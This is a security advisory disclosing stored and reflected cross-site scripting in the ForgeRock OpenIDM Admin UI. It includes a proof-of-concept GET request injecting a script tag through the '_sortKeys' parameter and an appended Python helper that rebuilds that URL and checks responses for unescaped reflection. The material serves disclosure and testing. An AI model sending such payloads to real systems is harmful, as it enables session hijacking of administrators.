ForgeRock persistent and reflected Cross Site Scripting (XSS)

Cross Site Scripting (XSS)

Product OpenIDM
Affected versions 4.0.0, 4.5.0
Fixed versions
Component Admin UI
Severity Medium

Description:

OpenIDM is vulnerable to both persistent (stored) and reflected cross-site scripting (XSS) in the Admin UI. Script injected through either vector executes in the browser session of the administrator viewing the affected page, which could lead to session hijacking or phishing.

Report Timeline
************************
17-Jan-2017 - Reported
17-Jan-2017 - Vendor response
28-Mar-2017 - Vendor fixed
07-Apr-2017 - Publicly disclosed

POC:

XSS persistent

Object management option >> field "Managed Object Name"

A script payload entered as the managed object name is stored and executes whenever the object is rendered in the Admin UI.

XSS reflected

User management option >> parameter "_sortKeys"

The value of the "_sortKeys" query parameter is reflected into the response without output encoding, so a crafted URL such as the following executes the script for whoever opens it:

GET /openidm/managed/user/86cdebd5-d685-4090-bc5c-3d8ea79fe3aa/authzRoles?page=1&_pageSize=50&sort_by=_id&_sortKeys=_id<script>alert("Xss");</script>&_queryFilter=true&_fields=&_pagedResultsOffset=0&_totalPagedResultsPolicy=ESTIMATE
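The following is an added example, not code from the advisory or from ForgeRock. It rebuilds the reflected-XSS request above with the payload properly URL-encoded and then classifies a response body as reflecting the payload unescaped (vulnerable), reflecting it HTML-escaped (the expected post-fix behaviour), or not reflecting it at all. The base URL and the two response bodies are constructed for the example; they are not captured OpenIDM output. The same classification applies to the persistent case if it is run against the page that later renders a stored "Managed Object Name".

```python
"""Added example (not part of the ForgeRock advisory): rebuild the advisory's
reflected-XSS request and check whether a response body echoes the `_sortKeys`
value without HTML encoding.  Sample responses are constructed, not real
OpenIDM output."""
import html
from urllib.parse import parse_qs, urlencode, urlsplit

# Payload from the advisory's GET request (ASCII quotes; the page shows it raw).
POC_PAYLOAD = '_id<script>alert("Xss");</script>'

# Path and user id exactly as they appear in the advisory's request line.
AUTHZ_ROLES_PATH = "/openidm/managed/user/{user_id}/authzRoles"


def build_poc_url(base_url: str, user_id: str, payload: str = POC_PAYLOAD) -> str:
    """Rebuild the advisory's request URL with the payload URL-encoded.

    `base_url` is an assumed lab instance; the remaining query parameters are
    taken verbatim from the advisory.
    """
    query = {
        "page": "1",
        "_pageSize": "50",
        "sort_by": "_id",
        "_sortKeys": payload,
        "_queryFilter": "true",
        "_fields": "",
        "_pagedResultsOffset": "0",
        "_totalPagedResultsPolicy": "ESTIMATE",
    }
    path = AUTHZ_ROLES_PATH.format(user_id=user_id)
    return f"{base_url}{path}?{urlencode(query)}"


def sort_keys_from_url(url: str) -> str:
    """Return the decoded `_sortKeys` value, i.e. what the server actually sees."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("_sortKeys", [""])[0]


def classify(body: str, payload: str = POC_PAYLOAD) -> str:
    """Classify how a response body treats the injected value.

    'reflected-unescaped' : active markup present verbatim -> XSS condition
    'reflected-escaped'   : only the HTML-escaped form is present -> fixed
    'not-reflected'       : the value does not appear at all
    """
    if payload in body:
        return "reflected-unescaped"
    if html.escape(payload, quote=True) in body:
        return "reflected-escaped"
    return "not-reflected"


# Constructed sample responses (hypothetical; not captured from OpenIDM).
VULNERABLE_BODY = '<div class="error">Invalid sort key: ' + POC_PAYLOAD + "</div>"
HARDENED_BODY = (
    '<div class="error">Invalid sort key: '
    + html.escape(POC_PAYLOAD, quote=True)
    + "</div>"
)


if __name__ == "__main__":
    # "https://idm.example.test" is an assumed lab host; the user id is the
    # one shown in the advisory's request line.
    url = build_poc_url("https://idm.example.test", "86cdebd5-d685-4090-bc5c-3d8ea79fe3aa")
    print(url)
    print("server sees _sortKeys =", sort_keys_from_url(url))
    print("vulnerable sample:", classify(VULNERABLE_BODY))
    print("hardened sample:  ", classify(HARDENED_BODY))
```

Against a live lab instance you would fetch `build_poc_url(...)` with an authenticated administrator session and pass the response text to `classify`; a result of "reflected-unescaped" reproduces the advisory's finding, while "reflected-escaped" is what a fixed build should return.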


Workaround:

No workaround available.

Resolution:

Update/upgrade to a fixed version or deploy the relevant patch bundle.
